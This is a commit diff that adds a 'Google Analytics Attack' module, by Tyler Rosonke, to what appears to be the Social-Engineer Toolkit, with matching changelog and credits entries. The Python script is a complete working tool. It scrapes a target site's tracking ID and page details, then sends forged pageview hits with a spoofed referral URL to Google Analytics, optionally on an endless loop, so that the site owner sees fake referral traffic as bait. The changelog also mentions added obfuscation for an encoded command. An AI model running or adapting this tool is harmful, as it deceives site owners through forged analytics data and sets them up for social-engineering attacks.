add google analytics module

modules/google_analytics_attack.py

@@ -0,0 +1,127 @@
+#!/usr/bin/env python
+print "Loading module. Please wait..."
+import src.core.setcore 
+import sys
+import requests
+import re
+import time
+import random
+
+MAIN="Google Analytics Attack by @ZonkSec"
+AUTHOR="Tyler Rosonke (@ZonkSec)"
+
+### MAIN ###
+def main():
+    print_title()
+    # determins if auto or manual, then calls functions
+    mode_choice = raw_input("[*] Choose mode (automatic/manual): ")
+    if mode_choice in ("automatic","auto"):
+        print "\n[*] Entering automatic mode.\n"
+        url = raw_input("[*] Target website (E.g. 'http://xyz.com/'): ")
+        params = auto_params(url)
+    elif mode_choice in ("manual","man"):
+        print "\n[*] Entering manual mode."
+        params = manual_params()
+    else:
+        print "\n[-] Invalid mode.\n"
+        sys.exit()
+    # params have been collected, prompts for print
+    print "\n[+] Payload ready."
+    printchoice = raw_input("\n[*] Print payload?(y/n): ")
+    if printchoice == "y":
+        print_params(params)
+    
+    #sends request
+    raw_input("\nPress <enter> to send payload.")
+    send_spoof(params)
+
+    #prompts for loop, calls function if need be
+    loopchoice = raw_input("\n[*] Send payload on loop?(y/n) ")
+    if loopchoice == "y":
+        looper(params)
+    raw_input("\n\nThis module has finished completing. Press <enter> to continue")
+
+### print_params - loops through params and prints
+def print_params(params):
+    print
+    for entry in params:
+        print entry + " = " + params[entry]
+
+### looper - prompts for seconds to sleep, starts loop
+def looper(params):
+    secs = raw_input("[*] Seconds between payload sends: ")
+    raw_input("\nSending request every "+secs+" seconds. Use CTRL+C to terminate. Press <enter> to begin loop.")
+    while True:
+        send_spoof(params)
+        time.sleep(int(secs))
+
+### send_spoof - randomizes client id, then sends request to google service
+def send_spoof(params):
+    params['cid'] = random.randint(100,999)
+    r = requests.get('https://www.google-analytics.com/collect', params=params)
+    print "\n[+] Payload sent."
+    print r.url
+
+### auto_params - makes request to target site, regexes for params
+def auto_params(url):
+    try: #parses URL for host and page
+        m = re.search('(https?:\/\/(.*?))\/(.*)',url)
+        host = str(m.group(1))
+        page = "/" + str(m.group(3))
+    except:
+        print "\n[-] Unable to parse URL for host/page. Did you forget an ending '/'?\n"
+        sys.exit()
+    try: #makes request to target page
+        r = requests.get(url)
+    except:
+        print "\n[-] Unable to reach target website for parsing.\n"
+        sys.exit()
+    try: #parses target webpage for title
+        m = re.search('<title>(.*)<\/title>', r.text)
+        page_title = str(m.group(1))
+    except:
+        print "\n[-] Unable to parse target page for title.\n"
+        sys.exit()
+    try: #parses target webpage for tracking id
+        m = re.search("'(UA-(.*))',", r.text)
+        tid = str(m.group(1))
+    except:
+        print "\n[-] Unable to find TrackingID (UA-XXXXX). Website may not be running Google Anayltics.\n"
+        sys.exit()
+    #builds params dict
+    params = {}
+    params['v'] = "1"
+    params['tid'] = tid
+    params['cid'] = "555"
+    params['t'] = "pageview"
+    params['dh'] = host
+    params['dp'] = page
+    params['dt'] = page_title
+    params['aip'] = "1"
+    params['dr'] = raw_input("\n[*] Enter referral URL to spoof (E.g. 'http://xyz.com/'): ")
+    return params
+
+### manual_params - prompts for all params
+def manual_params():
+    params = {}
+    params['v'] = "1"
+    params['tid'] = raw_input("\n[*] Enter TrackingID (tid)(UA-XXXXX): ")
+    params['cid'] = "555"
+    params['t'] = "pageview"
+    params['aip'] = "1"
+    params['dh'] = raw_input("[*] Enter target host (dh)(E.g. 'http://xyz.xyz)': ")
+    params['dp'] = raw_input("[*] Enter target page (dp)(E.g. '/aboutme'): ")
+    params['dt'] = raw_input("[*] Enter target page title (dt)(E.g. 'About Me'): ")
+    params['dr'] = raw_input("[*] Enter referal page to spoof (dr): ")
+    return params
+
+### print_title - prints title and references
+def print_title():
+    print "\n----------------------------------"
+    print "      Google Analytics Attack     "
+    print "    By Tyler Rosonke (@ZonkSec)   "
+    print "----------------------------------\n"
+    print "User-Guide: http://www.zonksec.com/blog/social-engineering-google-analytics/\n"
+    print "References:"
+    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/reference"
+    print "-https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters\n\n"

readme/CHANGELOG

@@ -3,6 +3,7 @@ version 7.4
 ~~~~~~~~~~~~~~~~
 
 * added better obfuscation around encodedcommand
+* added new third party module google analytics attack: # https://github.com/ZonkSec/google-analytics-attack. Walkthrough here: http://www.zonksec.com/blog/social-engineering-google-analytics/
 
 ~~~~~~~~~~~~~~~~
 version 7.3.16

readme/CREDITS

@@ -58,6 +58,7 @@ Special thanks to the following people who have contributed to SET:
 * Thanks to Larry Spohn (spoonman) for the python udp 1434 sql discovery code
 * Persistence on OSX - http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
 * special thanks to d4rk0s for the full screen attack
+* Zonksec for the third party google analytics module http://www.zonksec.com/blog/social-engineering-google-analytics/
 
 The Social-Engineer Development Team: